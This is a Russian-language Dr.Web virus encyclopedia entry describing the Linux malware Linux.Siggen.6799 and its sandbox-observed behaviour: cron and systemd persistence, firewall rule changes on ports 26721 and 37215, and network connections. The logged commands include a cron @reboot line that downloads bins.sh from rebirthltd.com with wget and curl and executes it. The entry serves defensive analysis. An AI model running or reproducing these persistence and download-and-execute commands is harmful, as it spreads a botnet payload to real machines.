Для корректной работы нашего сайта необходимо включить поддержку JavaScript в вашем браузере.
Linux.Siggen.6799
Добавлен в вирусную базу Dr.Web:
2024-03-19
Описание добавлено:
2024-03-19
Техническая информация
Для обеспечения автоматического запуска и распространения:
Создает или модифицирует следующие файлы:
/var/spool/cron/crontabs/root
/etc/init.d/job
Вредоносные функции:
Запускает себя в качестве демона
Подменяет имя приложения на:
Управляет службами:
['/bin/systemctl', 'enable', 'bot']
Запускает процессы:
/sbin/xtables-multi iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
/bin/sh -c /usr/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
/bin/sh -c /bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
sudo pfctl -f -
/bin/sh /bin/bins.sh
/bin/sh -c ufw deny 37215/udp
chmod 777 /bin/bins.sh
/bin/sh -c /bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
/bin/sh -c netsh advfirewall firewall add rule name=\x22Block_Port_37215_UDP\x22 dir=in action=block protocol=UDP localport=37215
/bin/kmod /sbin/modprobe ip_tables
/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
/bin/sh -c netsh advfirewall firewall add rule name=\x22Block_Port_37215_TCP\x22 dir=in action=block protocol=TCP localport=37215
/bin/sh -c iptables -A INPUT -p tcp --dport 37215 -j DROP
crontab -l
/bin/sh -c busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
chmod +x /bin/bins.sh
/sbin/xtables-multi iptables -A INPUT -p udp --dport 37215 -j DROP
/bin/systemctl enable bot
/bin/sh -c echo \x22block drop proto udp from any to any port 37215\x22 | sudo pfctl -f -
/bin/sh -c firewall-cmd --zone=public --add-rich-rule=\x27rule family=\x22ipv4\x22 port protocol=\x22udp\x22 port=\x2237215\x22 reject\x27
/bin/sh -c echo \x22block drop proto tcp from any to any port 37215\x22 | sudo pfctl -f -
/sbin/initctl start bot
busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
/bin/sh -c nft add rule ip filter input udp dport 37215 drop
/bin/sh -c firewall-cmd --zone=public --add-rich-rule=\x27rule family=\x22ipv4\x22 port protocol=\x22tcp\x22 port=\x2237215\x22 reject\x27
/bin/sh -c iptables -A INPUT -p udp --dport 37215 -j DROP
/bin/sh -c ufw deny 37215/tcp
/bin/sh -c nft add rule ip filter input tcp dport 37215 drop
/bin/sh -c iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
crontab -
/bin/sh -c (crontab -l ; echo \x22@reboot /bin/bash -c \x22/bin/wget http://rebirthltd.com/bins.sh; chmod 777 /bin/bins.sh; /bin/sh /bin/bins.sh; /bin/curl -k -L --output /bin/bins.sh http://rebirthltd.com/bins.sh; chmod +x /bin/bins.sh; /bin/sh /bin/bins.sh\x22\x22) | crontab -
/sbin/xtables-multi iptables -A INPUT -p tcp --dport 37215 -j DROP
Выполняет операции с файловой системой:
Модифицирует права доступа к файлам:
/var/spool/cron/crontabs/tmp.WkLAve
/etc/init.d/job
Удаляет папки:
Создает или модифицирует файлы:
/self
/proc/830/cmdline
/dev/full
/var/spool/cron/crontabs/tmp.WkLAve
/etc/init/bot.conf
/root/.bashrc
/lib/systemd/system/bot.service
/etc/systemd/system/job.service
Удаляет файлы:
Изменяет время создания/доступа/модификации файлов:
Сетевая активность:
Ожидает входящих соединений на портах:
127.0.0.1:8345
0.0.0.0:26721
Устанавливает соединение:
8.#.8.8:53
[:##]:37215
127.0.0.1:37215
13#.#95.4.2:53
19#.###.175.20:35342
DNS ASK:
Посылает данные следующим серверам:
Получает данные от следующих серверов:
Прочее:
Собирает информацию о сетевой активности
Рекомендации по лечению
Linux
Демо бесплатно
На 1 месяц (без регистрации) или 3 месяца (с регистрацией и скидкой на продление)
Поздравляем!
Обменяйте их на скидку до 50% на покупку Dr.Web.
Получить скидку
Скачайте Dr.Web для Android
Бесплатно на 3 месяца
Все компоненты защиты
Продление демо через AppGallery/Google Pay
Если Вы продолжите использование данного сайта, это означает, что Вы даете согласие на использование нами Cookie-файлов и иных технологий по сбору статистических сведений о посетителях. Подробнее
OK